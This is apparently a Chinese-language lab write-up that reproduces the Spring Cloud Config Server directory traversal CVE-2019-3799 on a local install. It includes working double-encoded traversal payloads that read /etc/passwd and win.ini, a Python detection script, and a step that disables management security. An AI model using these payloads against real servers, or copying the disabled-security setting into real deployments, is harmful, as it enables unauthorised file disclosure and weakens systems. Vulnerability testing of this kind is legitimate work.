spring cloud config任意文件读取测试

1、下载对应psring cloud config 有漏洞的版本：

https://github.com/spring-cloud/spring-cloud-config/releases

Spring Cloud Config 2.1.0 to 2.1.1

Spring Cloud Config 2.0.0 to 2.0.3

Spring Cloud Config 1.4.0 to 1.4.5

 

2、下载后，idea加载，maven部署：

由于本身对java spring不熟悉，加载后我直接运行了”run”

但是始终提示报错：

2019-07-16 23:37:15.984 INFO 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Fetching config from server at: http://localhost:8888
2019-07-16 23:37:17.175 WARN 20988 — [ main] c.c.c.ConfigServicePropertySourceLocator : Could not locate PropertySource: I/O error on GET request for “http://localhost:8888/bar/default”: Connection refused: connect; nested exception is java.net.ConnectException: Connection refused: connect

网上查了很多资料，都说是配置问题，后来问了SN，可能原因是运行的模块不对，因为测试的是server端的漏洞，

（1）按照官网:

$ cd spring-cloud-config-server
$ ../mvnw spring-boot:run

（2）或者在idea中选中\spring-cloud-config-server\src\main\java\org\springframework\cloud\config\server\ConfigServerApplication.java

点击运行：

测试查看：

已经没有了warnning，但最下面会有tomcat的错误，不影响，具体什么原因我也不知道：

java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:428) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:687) ~[tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1468) [tomcat-embed-core-8.5.31.jar:8.5.31]
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [na:1.8.0_191]
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [na:1.8.0_191]
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) [tomcat-embed-core-8.5.31.jar:8.5.31]
at java.lang.Thread.run(Thread.java:748) [na:1.8.0_191]

测试访问http://127.0.0.1:8888/admin/info，正常

访问http://127.0.0.1:8888/admin/env，提示401：

401是认证问题，翻查了下，需要修改文件：

\spring-cloud-config-1.4.4.RELEASE\spring-cloud-config-server\src\main\resources\configserver.yml

默认如下：

info:
  component: Config Server
spring:
  application:
    name: configserver
  autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
  jmx:
    default_domain: cloud.config.server
  cloud:
    config:
      server:
        git:
          uri: https://github.com/spring-cloud-samples/config-repo
          repos:
            - patterns: multi-repo-demo-*
              uri: https://github.com/spring-cloud-samples/config-repo

server:
  port: 8888
management:
  context_path: /admin

在management节点下添加：

  security:
    enabled: false

修改后为:

info:
  component: Config Server
spring:
  application:
    name: configserver
  autoconfigure.exclude: org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration
  jmx:
    default_domain: cloud.config.server
  cloud:
    config:
      server:
        git:
          uri: https://github.com/spring-cloud-samples/config-repo
          repos:
            - patterns: multi-repo-demo-*
              uri: https://github.com/spring-cloud-samples/config-repo

server:
  port: 8888
management:
  security:
    enabled: false
  context_path: /admin

在重新运行，正常：

（3）测试任意文件读取：

设置Accept: text/html,application/xhtml+xml,application/xml;q=0.9,application/octet-stream,image/webp,image/apng,*/*;q=0.8

主要payload：

http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd

http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini

http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd

http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini

http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a

http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a

http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a

http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a

检测脚本：

#coding=utf-8
'''
Autor: c0ny1
Date: 2019-04-20 16:41
Description: Directory Traversal with spring-cloud-config-server(CVE-2019-3799)
Affected Pivotal Products and Versions:
	Spring Cloud Config 2.1.0 to 2.1.1
	Spring Cloud Config 2.0.0 to 2.0.3
	Spring Cloud Config 1.4.0 to 1.4.5
	Older unsupported versions are also affected
'''
import requests
from requests import ConnectionError
WIN_CHECK_KEYWORD = '[extensions]'
LINUX_CHECK_KEYWORD = 'root:'
def init_poc():
	pocs = []
	payload = '/a/b/master/' + '..%252F'*2 + 'etc%252Fpasswd'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/master/' + '..%252F'*6 + 'Windows%252Fwin.ini'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/master/' + '..%252F'*50 + 'etc%252Fpasswd'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/master/' + '..%252F'*50 + 'Windows%252Fwin.ini'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/c/' + '..%252F'*3 + 'etc%252Fpasswd?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/c/' + '..%252F'*7 + 'Windows%252Fwin.ini?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/c/' + '..%252F'*50 + 'etc%252Fpasswd?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)

	payload = '/a/b/c/' + '..%252F'*50 + 'Windows%252Fwin.ini?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)
	return pocs
pocs = init_poc()
def poc(url):
    for p in pocs:
        url = url if not url.endswith('/') else url[0:len(url)-1] #去掉结尾/
        target_url = url + p.get('payload')
        try:
            r = requests.get(target_url,timeout=10)
        except Exception,e:
			continue
        if (r.status_code == 200) and (p.get('keyword') in r.content):
            return True
    return False

参考c0ny1大佬在gv7.me的分析，